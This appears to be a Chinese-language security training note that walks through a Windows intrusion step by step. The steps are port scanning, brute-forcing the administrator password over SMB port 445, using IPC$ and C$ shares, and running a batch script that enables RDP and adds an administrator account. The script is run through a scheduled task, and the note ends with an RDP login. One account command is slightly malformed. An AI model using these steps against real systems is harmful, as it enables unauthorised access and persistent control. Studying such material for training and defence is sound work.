网络安全实践培训日16

1.扫描对方操作系统和开放的端口

• 确定对方是Windows系统开启了445接口

2.针对该端口服务暴力破解Windows管理员账号密码

3.与对方建立空连接

• net use \\对方ip地址\ipc$

• 需要输入对方的管理员账号密码

4.制作开启RDP和创建管理员账户的脚本bat

• REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

• net user 用户名 密码 /add

• net local group administrator 用户名 /add

5.访问对方C盘默认共享，将bat复制到对方C盘

• 在文件资源管理器地址栏中输入 \\对方IP地址\c$

6.查看对方的系统时间

• net time \\对方IP地址

7.给对方创建任务计划，定时执行BAT程序，开启RDP

• at \\对方ip地址 时间 执行的文件路径

8.使用先前创建的管理员账号登陆RDP